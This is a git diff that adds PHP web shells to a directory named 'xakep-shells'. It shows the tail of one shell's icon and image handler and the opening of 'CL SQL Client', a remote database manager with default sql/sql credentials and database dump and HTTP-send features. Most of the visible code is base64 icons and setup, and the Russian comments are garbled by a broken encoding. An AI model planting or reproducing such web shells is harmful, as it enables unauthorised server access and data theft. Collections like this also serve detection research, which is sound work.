+"j1kp45tT7yQbhkOpp5kmzOIIA+slmIchzeSblYEMbyQKW9byTY57TreSzIhqGvmSkSfW8kFvyV1v".
+"JCVy2tfMkIN5OYE0L/OS0ZuKG8knKQDT6yT8eQABe8kGFuv1knOeIY4mvmShnybsne8lXEilbyQY".
+"f8g5UJp5kkOXe8lbkxxxLg9fWSm/e8kG8eJy6t61ksdtDeSpxAkODr3koZ51Z9O8kGnkagN5Jxyg".
+"9byUX73kqOB1vJBQl8XBr5kpO3W8lhyOr3kmJ7695IN3ECj+XkgY+13vJWxzGxn6eslHcW1p5kg3".
+"HIir3ksy5zkdbyWDKoreSCADQv8AOSBssgRrXzJKC9HvJYToXvJNjlV3vJAbqs9fMkJfy+7W8kIN".
+"5BtLPeSMPN5Izy9TXzJbg563kgnka0N5LRmSQHvJNl7Sz3kkGTHW8kHTy4ZYiuT/ADkucEvreSuf".
+"8jeGP1kkOVdbyQU4ssgA1X7yXPmfca3kuri5RjiQTV/WS5+TJ8nBp5kgmS3W8loJPW8kwyB63kmx".
+"yGNXvJApyo33kjfUVvJWzO7HdoK/GqiD3vJAEFv1kgZ0b7yXTjyDYzjT1kpbwBrXzJACoYm8kcjY".
+"ZMDeSOM7tTTzJbyjHEit5IJ5Gmt5JsMhiam8kZZgdbySb3qDeSBt2O93p5khJ11vJCB8uQEu95IH".
+"K1B9ZIzGzrTzJKM2IL3kgw51qbyTZ9jeSCXOtPMlmWTChvJBozb+MkmRrreSbHkHU3kseut5IOr/".
+"AByAKm8lLMsSQbyWYEHreSUcrn9ZIDcDqW+ck4yx9byWbu95Jg3reSDCCQ708ySu3W8lXPNsaGnm".
+"S5xyepvJBfHEbO/mSk3td7yTa47hleSXHIka08yQHGcnobyW8m5wcjeSbHMBq3kt5Mjk3T5yQSyJ".
+"P8ZJ8GBd7yQdNbyWYgks7jzJAbxud7yQl9rs95IQPyA0BN5KenW8lXk5NzMdKayUhm9AbyQBypre".
+"Sw5uNbyWkt1vJA7m8kGP3vJG7veSYZd6eZIJrreSBRkRV7yRjlXW8lXjALv9ZJMvaTWg7yQZln0e".
+"8lozINTeSXd3vJM/w8kD5Znb+slHd3vJdBOO0jQ+ZKIHqbyQaOUtte8kwy9rPeSMdur18yT45A4d".
+"/MkGcf8AM/X1kn5+bEttN5KfQl6eZJMyKAGnmSDTyd7yW4cjn9ZJMqdbyTcZ73kg1qt18yQm/IHd".
+"7yQgzLIavr3kkNKg3km5CMdDeSXHMk63kgN/V7yTFmBB17ySZmut5IORYVvJA+BHU3kkyzrreSMM".
+"u95Jz8VkgfibIO95JMg2RreSfiJqx07yU8+Ri5NfMkAcgOt5KgzB0N5Ln3P1vJbubreSDpzwYO95".
+"KDtV7yTfnLN95LH7695IKBzj/up5kkFA73knx5iAB95JTmWp9ZIDfqH17yUn73krAghnr5kt5Msc".
+"urHzJBHcepvJNhk51vJaR3vJGPIMTreSAY7tr3khDl9z18yQgzIsKm8kmJcs95J+XMZMxvJLiSC7".
+"3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB".
+"B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn".
+"5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO".
+"MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U".
+"hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc".
+"/wDchCA97/3IQhB//9k=",
+"pdisk"=>
+"R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK".
+"yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX".
+"V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O".
+"jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp".
+"qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N".
+"Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C".
+"BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF".
+"IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7",
+"odel"=>
+"R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq".
+"SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs="
+
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "<center>";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+echo $u.":<img src=\"".$sul."act=img&img=".$u."\" border=\"1\"><br>";
+  }
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+
+?>
+<? // [CT] TEAM SCRIPTING - RODNOC ?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/cyberlords_sql.php.php.txt b/xakep-shells/PHP/cyberlords_sql.php.php.txt
new file mode 100644
index 0000000..f3a39b6
--- /dev/null
+++ b/xakep-shells/PHP/cyberlords_sql.php.php.txt
@@ -0,0 +1,1722 @@
+<?php
+/*
+/********************************************************************************
+/*
+/*  CL SQL Client - ïðîäâèíóòûé SQL-ìåíåäæåð íå óñòóïàþùèé phpmyadmin àíàëîãàì.
+/*
+/*  Âû ìîæåòå áåñïëàòíî ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà (cyberlords.net):
+/*
+/*  ~~~~~~~~~~~~~~~~
+/*  [!] Important
+/*  [+] New
+/*  [-] Fixed error
+/*  [*] Changes
+/*  ~~~~~~~~~~~~~~~~
+/*
+/*  Library features:
+/*   ~ Îïòèìèçèðîâàíûé àëãîðèòì
+/*   ~ Âîçìîæíîñòü ïîäêëþ÷åíèÿ ê ÁÄ ÷åðåç Unix Socket
+/*   ~ Ïðîñìîòð, ðåäàêòèðîâàíèå âñåõ äîñòóïíûõ áàç äëÿ àêêàóíòà, ñîçäàíèå íîâûõ áàç.
+/*   ~ Ïðîñìîòð, ðåäàêòèðîâàíèå, ñîçäàíèå íîâûõ òàáëèö ñî âñåâîçìîæíûìè àòðèáóòàìè.
+/*   ~ Ðåäàêòèðîâàíèå îòäåëüíûõ ïîëåé òàáëèö, óäàëåíèå çàïèñåé, äîáàâëåíèå çàïèñåé â òàáëèöó, ïåðåèìåíîâàíèå òàáëèö.
+/*   ~ Âûïîëíåíèå ïðîèçâîëüíîãî çàïðîñà ê ÁÄ è òàáëèöàì.
+/*   ~ Äàìïû áàç è òàáëèö, ñ âîçìîæíîñòüþ îòïðàâêè ïî HTTP èëè ïðîñòî ïîêàçà äàìïà â áðîóçåðå.
+/*   ~ Ïðîñìîòð ôàéëîâ.
+/*
+/*  Date started: 26.09.2005
+/*
+/*  Coded by n0 [nZer0]
+/*  Copyright (C) n0 2002-2005
+/*  www.cyberlords.net
+/*
+/*  Last modify: 10.01.2006 v.1.0 pre-release build #7
+/*
+/*  At least some greetz fly to: Peng(0), k0pa, Satyr =)
+/*
+/********************************************************************************
+*/
+
+//-----------------------------------------------
+// USER CONFIGURABLE ELEMENTS
+//-----------------------------------------------
+
+// Script self [!]
+$baseurl  = $_SERVER["PHP_SELF"]."?";
+// Self Version
+$version = 'v.1.0 pre-release build #7';
+// Language [!][+]
+$language = "ru";
+// Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) [!]
+$tmpdir = "./";
+// Use unix socket? Only for MySQL
+$unix_socket = 0;
+// time limit of execution this script over server quote (seconds), 0 = unlimited.
+$timelimit = 0;
+// Authentification [+]
+$auth = 1;
+// user login
+$user = 'sql'; 
+// DON'T FORGOT ABOUT PASSWORD!!!
+$passwd = 'sql'; // user password
+// http-auth message [+]
+$login_txt = "User Authenticate :: SQL Client";
+// http-auth error message [+]
+$accessdeniedmess = "<h3>Access Forbidden</h3><BR>You must enter a valid login and password to access this resource";
+
+// OS
+$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
+if($win) {
+ $unix_socket = 0;
+}
+
+// Set php.ini sections
+ignore_user_abort(true); // ignore user abort
+ini_set( 'display_errors', true ); // display errors
+ini_set( 'html_errors', false ); // html error
+if($unix_socket && dbtype == 'mysql') {
+ ini_set( 'mysql.default_socket', "/tmp/mysql.sock" ); // [!][+]
+}
+error_reporting(E_ERROR | E_PARSE | E_WARNING); // Error reporting E_ERROR | E_PARSE | E_WARNING
+ini_set( 'output_buffering', false ); // output buffering
+set_time_limit($timelimit); // time limit
+set_magic_quotes_runtime(false); // magic quotes runtime NULL
+
+//-----------------------------------------------
+// END USER CONFIGURABLE ELEMENTS
+//-----------------------------------------------
+
+// PHP version
+$phpversion = phpversion();
+
+// Authenticate function [+]
+if (!@stristr($_SERVER["GATEWAY_INTERFACE"],"cgi") || $auth == true) {
+ if (!empty($user) && ( !isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$user || $_SERVER['PHP_AUTH_PW']!==$passwd)) {
+  header('WWW-Authenticate: Basic realm="'.$login_txt.'"');
+  header('HTTP/1.0 401 Unauthorized');
+  die( $accessdeniedmess );
+ }
+}
+
+// HEADERS [!]
+header("Content-Type: text/html; charset=windows-1251");
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+// Checking php version [!]
+if(version_compare($phpversion, '4.1.0') == -1) {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+}
+
+// Cheking PHP version
+if (str_replace('.',null,$phpversion) < 410) {
+ die("<BR>Warning! You should update PHP to 4.1.0. Current version ".$phpversion."<BR><BR>");
+}
+
+// Checking magic_quotes_gpc()
+if (@get_magic_quotes_gpc()) {
+ foreach ($_POST as $k=>$v) {
+  $_POST[$k] = stripslashes($v);
+ }
+ foreach ($_GET as $k=>$v) {
+  $_GET[$k] = stripslashes($v);
+ }
+}
+
+// Buffering start
+@ob_start();
+// Set options
+@ob_implicit_flush(0);
+// Start Session
+@session_start();
+
+// Microtime
+if (!function_exists("get_micro_time")) {
+ function get_micro_time() {
+  list($usec, $sec) = explode(" ", microtime());
+  return ((float)$usec + (float)$sec);
+ }
+}
+
+// starttime
+define("start_time",get_micro_time());
+
+// Images Array
+$images_array = array(
+"sql"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE
+dFJOU////wBAKqn0AAAAiUlEQVR42mJgZmZEAszMAAHEwMzIhAQYmQECCEMAIIBAAgwMTBAMEgAI
+IKAAkGYCc8ECAAGEIQAQQGAzGJAEAAIILsAAFQAIIJAWsB6IyYzMAAGEZC0D2FqAAMJwB0AAYQgA
+BBAD3C9AHsgvAAEEFIACRqA0EAAEEEKAmREsABBASALMYAGAAAMA5HsB3KxlNZ8AAAAASUVORK5C
+YII=
+",
+"log_in_off"=>
+"R0lGODlhFgAWAOYAAAAAAP////7+7////f///vfzbffzbvfzc/j0dvj0fvn1ivr3nPv4p/v5tfv
+5tv382/PtbPXvh/bxmvfzsf370fn32v375P/62f364/377P/+9//kQP/nVf/nVv/qbf/uhf/uhv/
+xoP/1vP/2wP/62/rVLO7ZaPfuwv366/raSvreaP3zzdfBd/756OrEXtO8fPLZlv/++8+2eMuwdeW
+mKuzRm9TQyMywe+CaKsyxg/Ls4u7l2OWvZ+bYxffy7Prz7Pnu5OW3nseNbsqPc82nlsuMcsudisR
+xVOCqlcpwVM2nmr9XO8V6ZcV+a7xHKMN5ZsV8acZ9a8V8a7+AcMqRgsqXi+W6r82nnsymnbxSOrx
+SPMJxYMJ0Y8V8bLY8KLlKNbxSP8V8brlKObhIObtTQrtTRb5fUsp0aMFxZceKgcqln7lJO8Fzab9
+5cMyMhMWHgMeRirtUSsFza7txa8qZlLtTTMN7d7ExLLtUUcFzcMN7eL15drtUUrxVU8BgX////yH
+5BAEAADYALAAAAAAWABYAAAfPgDaCg4SFhoeIiYpVaExbT0aKhXJBLQEjKThekoJ5QDErbVMuGyV
+OklhWBCRUgkIdGzRHimwoAhpvgkMeHBtZil0BFA8/e3MwILxailABDQ4PGhciIR8qYMwBDAvQ0tQ
+8UYlERQESCtzR00lqiERSFj0sCefdSHXtUhg9LyYI8ws1zvDBh2GHDANLyJARs8YMHERKwljQMQN
+CgTGcbFxxk4EihC9kmmS0E0PHjQgHyGQUZMdHjgl3ynBZaUPPgAon4tAURMdPHzxpdgodiigQADs=
+",
+"info"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs
+/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv
+/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3
+/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr
+/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX
+pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA
+dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW
+9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK
+4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm
+C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg
+2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF
+CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA
+Ow==",
+"browse_db"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAPUExURZmZzAAAAP///2ZmZgAAANTzOHcA
+AAAFdFJOU/////8A+7YOUwAAAG9JREFUeNpiYEEDAAHEwMKMAlgAAggowMDAAMJgwMwCEEAYAgAB
+hKEFIICAAkxMTCAMBswsAAEEEmAECjCCAVAAIIAwVAAEEIYKgADCUAEQQBgqAAIIQwVAAGGoAAgg
+DBUAAYThUoAAYkD3PkCAAQBJdwJ8aqfwRgAAAABJRU5ErkJggg==
+",
+"browse_tbl"=>
+"iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAMAAAC67D+PAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAJUExURZmZzP///wAAAC6CLTEAAABCSURB
+VHjaYmCCA4AAYmBigAImgABCYgIEEANCAUAAMTAxQgETQAABmRAxRiaAAEISBQggJFGAAEISBQgg
+JBMAAgwAHDAAjTfpsEkAAAAASUVORK5CYII=
+",
+"host"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAVUExURf8AAMbGxoSEhJmZzP///wAAAAAA
+AM12SjgAAAAHdFJOU////////wAaSwNGAAAAmklEQVR42mJgQwMAAcQAZzGBABsbQAAxsDGDARMT
+IxAwsbIBBBBcgAUImIACAAHEwMYKYrJCFbCyAQQQXAAEWIEqAAIIJADRBNUCEEBAAVaIAFQLQACB
+rIVrAmkBCCCQLRABqBaAAEIIgLQABQACCGQoKxgwMoAFAAIIzR1sbAABBBNgA6sC2gAQQAwQFivc
+jwABxIDufYAAAwArFQQ55WWX3AAAAABJRU5ErkJggg==
+",
+"deltbl"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAkUExURZlmZv+ZM/9mAEBAQLOz2cwzM8wA
+AP8AAJkAAP///4yMjAAAAL6JDcIAAAAMdFJOU///////////////ABLfzs4AAAC2SURBVHjaYuBG
+AwABxMDNhQK4AQIIKMDAxsDFAgVs3AABBBRgY2TngHI5uLgBAgikhY2dnQOkHMjn4gYIIKAAJycn
+GzsHkABiLm6AAAIJMHMCFXEA+UAGN0AAQVRwQdSAVAAEEEIFO0QFQAAhmcEONgMggMACID4zM0iE
+ixsggEACrExsnGDADhQACCCgACsjWAEzSA0XN0AAgQSAzuKEAi5ugAACuZQD4Td2boAAYkD3PkCA
+AQCA0wiXuX9engAAAABJRU5ErkJggg==
+",
+"drop"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAYUExURZlmZv+ZM/9mAMwzM8wAAP8AAJkA
+AAAAAJHQzOoAAAAIdFJOU/////////8A3oO9WQAAAJFJREFUeNpiYEcDAAHEwM7AwgDnsbCzAwQQ
+AzsLIysblAuiAQIIKMvCChEB89kBAgisnAUkAuGzAwQQRD9QBMpnBwggqIEsMHPYAQIIrgImAhBA
+CDOgIgABxIBQDyEBAggowMzEAlHNCiIAAoiBnRnuMLAIQAABBeB8MAAIIKAWJD5QCUAAMaD7FiCA
+MAQAAgwAYLoGdQu5RxIAAAAASUVORK5CYII=
+",
+"tbl"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURZmZzAAAAP///wAAAPTjxFQAAAAE
+dFJOU////wBAKqn0AAAAZklEQVR42mJgRgMAAcSALgAQQEABBiTAzAwQQBgCAAEERIxMcMDIzAwQ
+QGABRjhiZgYIIAwVAAGEoQIggDBUAAQQhgqAAMJQARBAGCoAAghDBUAAgQSQADMzQABheA4ggDAE
+AAIMAAxGAgtuLhqmAAAAAElFTkSuQmCC
+",
+"db"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAPUExURZmZmZmZzAAAAP///wAAACr8yT8A
+AAAFdFJOU/////8A+7YOUwAAAINJREFUeNpiYEEDAAHEAMSMMAASAAggDAGAAAIJMDFDABNIACCA
+IAIMCEUAAQRVgRAACCCoCoQugABigBjJxMwEQSwAAQQXgKkACCAGiB0IFQABBBIAMeAqAAIIpgIG
+WAACCKqCgQHiLBYWgABiQHUnCwtAAAEF4KrBACCAGNC9DxBgAG1fAsX0YasPAAAAAElFTkSuQmCC
+",
+"index"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAYUExURYCAgP//mZmZzP/MMwAAAP///2Zm
+ZgAAAIJePFIAAAAIdFJOU/////////8A3oO9WQAAAJVJREFUeNpiYEcDAAHEwM6GAtgBAggowMTE
+BMJMDKyMzCzsAAGEEADzWdgBAgiuBcJnYwcIIKAAKysrEDOA+Kxs7AABBBIA0qwMrCA+UAAggKAq
+gHwQAJoBEEBQFSxAwAo2AyCAEGawQswACCAMMwACCK4CzAcKAAQQTAWEDxQACCCYCggfKAAQQBie
+AwggBnTvAwQYAKRBBR9UXrlRAAAAAElFTkSuQmCC
+",
+"primary"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAABLUExURfnHAOq7APXEAPTDAPrIAO6+APzK
+APPCAOy9AP7LAPHBAP3KAOa4APjGAO+/APDAAPfGAPvJAPLCAOi6AJmZzAAAAP///2ZmZgAAAMjq
+96cAAAAZdFJOU////////////////////////////////wABNAq3AAAAtklEQVR42mKQQAMAAcQg
+IQ4BoiAgLi4BEEBAAREREXERUR5GfiYWUXEJgACCCogKM7KKMnByikoABBBUiygHKzMzMxuDqARA
+AAEFxMTExMVEBbmZ+BiBWgACCCQgChQQE2Vh5wAyJAACCKYCKMIlCmRIAAQQTIWoKIMQWAAggJBU
+sIMFAAIIoYKFCSwAEEBIKgTAAgABhFDBxgsWAAggJBUMYAGAAIJ7DuhaECEBEEAM6N4HCDAAhuMU
+XdCwN9oAAAAASUVORK5CYII=
+",
+"empty"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAVUExURczMzJmZzJmZmf///2ZmZgAAAAAA
+AICwWGkAAAAHdFJOU////////wAaSwNGAAAAiElEQVR42mJgQwMAAcTAxoIC2AACCCjAyMgIwmDA
+wgYQQHABVlZWsABAAEG0sMIACxtAAAEFmJlZmZiYGBgYgCQrG0AAQQQQgA0ggMACzCysTKwMQMzM
+wgYQQBgCAAGEIQAQQBgCAAGEIQAQQBgCAAGEEGCGCAAEENRzMIeysAEEEAO69wECDAAaSAQP5Fbp
+rQAAAABJRU5ErkJggg==
+",
+"edit"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAPUExURZmZzMzMzP///wAAAAAAAJ7/OwsAA
+AAFdFJOU/////8A+7YOUwAAAIxJREFUeNpiYEEDAAHEAGMwgwALAwtAAMEEmBlBgJmBBSCAGGB8iA
+gDC0AAMUDUMkJFGFgAAggowMQE4TODtQAEEEgAyIaIgQwFCCCwAFARRBRoGkAAgbWAAUgrUAAggBA
+CTBABgACCagFbBRYACCAMFQABhKECIIAwVAAEENSlUAAUAAggBnTvAwQYAIWRAuW2b0fYAAAA
+AElFTkSuQmCC
+",
+"reload"=>
+"R0lGODlhFgAWANU/AFq69hZZuIXS9mTF+5Ph/Fym5GWx6ILb/Zzo/ond/jZosqXu/iNryn3W/ApSu
+2nC83TO+yxpsUuX3oXX+mq87Vay7lF/rGK57HXW/jqD1RRcxEh2tGG986Dr/qLs/nHS/hphxYHO9CF
+euJfm/mfI+3/N9G7P/ofW92nK/m7J+mm06Td0sG7O+y540Y7g/YDZ/G/Q/EBtr4jX+HTR+3HE8HXF8
+WC/9wZPvCpzzmvM/XXU+oHR9l/B/R9pywBMvf///yH5BAEAAD8ALAAAAAAWABYAAAb/wJ9wKNyIfD2
+fKEYUOpq/DaNQclknhkxgCNI0RRLZ7sGxDSCNUaglAu16REWYUqkDADweKjEqCDpwQwwnNBcXHBwAN
+jwDAygNCCOAQyIGYgYGKhMEDSkDJCg5DTMegT8MNS0OAQE+DjgGBAkpOSwwpIEbGRoRKxFbQgoMJSM
+ztzoLgSIOGxYWCk09AiMNDS8HyUI3G0IWTSAhCAgdHgvmplBCrT7s7ewODu7ywOlCPeYLHh0dCCEg9
+T9u2Ftw4MCLFwgEoIsy5IaIgRgwfIAUggE0ISJW/FihIQOTH/cifoABwwUBFTgc3GDloEUNBkNCHvh
+gIgcJCJtkUMC0Q4YBUHo9PIw7YAIFiQE2ODx4QOECjRMwY3o4UQCBCxNHk16oQ0GGhAhEpIEQ0UIAg
+gMQUiyl0VMCPSEa/qnLoEIGgbslCjD4SORJEwWtkgTg2yQI
+ADs=
+",
+"back"=>
+"R0lGODlhFgAWANU/AGXoXGvrYSKUIRWVFQuSC5T3eyzMKNr8yHPra1zUT4nzdHzuclrnVW3MYnLtZ
+ReqFnvwarr8qlfSTUKYQjGoLJP0gY30eVPMSKj4l0vHRMT9tHfuakO3PITzcVzfVE/lSmvdXWbcWFu
+eW2DUV1O5S4Xxec/9vVnOUGHWUuT/0r38sMjytnLgYrH4m676o7Puo2maab/3rZ75hIDvbo3VgY/xg
+4DybqzonKX5jUfgP5D4g5rzg5rzjbP5oQCQAP///yH5BAEAAD8ALAAAAAAWABYAAAbuwJ9wSBSKisj
+kTyQgKJ+/CWXlgyYFpEOqaiUSGqnYgdv9EWiHlmVc/g1uB1xBYfLZ7/aBYCh9mWQFFnQahCqGEYhOP
+wIcMSoFkAodFRYlCwsImQsuVQMkGhiQgh02EA4BAAAMHx8AGD4DDRE7FoKSpaeoDB4SGSM8sA09FZI
+dMxCmpwAeCRcXGSc1nRwYFccQG7khKAkSz9AlXAIUNTrZyiwgICEjIxInIwtkPw8IOg4A2xYzlwsb2
+QgCKBpCwEMHENw24MFDYE8RAgYchJAQYF4XAg8CeGBgsc
+uABzk+dOwywYeBkSTttEECY8CTIAA7
+",
+'home'=>
+"R0lGODlhGAAYALMJAN3d3WZmZurq6vz5ALKysoaGhgQEBMzMzP///////wAAAAAAAAAAAAAAAAAAA
+AAAACH5BAEAAAkALAAAAAAYABgAAAR8MMlJq704a1pmKcZWFUOYFIApngNBhKi6kW9rxCtt1G8q6gQ
+EzyC7ABHIoeaITBpsGGbTCR3ZgtOpkkLcZb8voqWA/WZfRrP5UJQUsp+PYcpOT98CNr19gudfe3ZNB
+QcEIIFjcIYBc011Ywe
+RkR8BjJKRfF2am5srnp8aEQA7
+",
+"save"=>
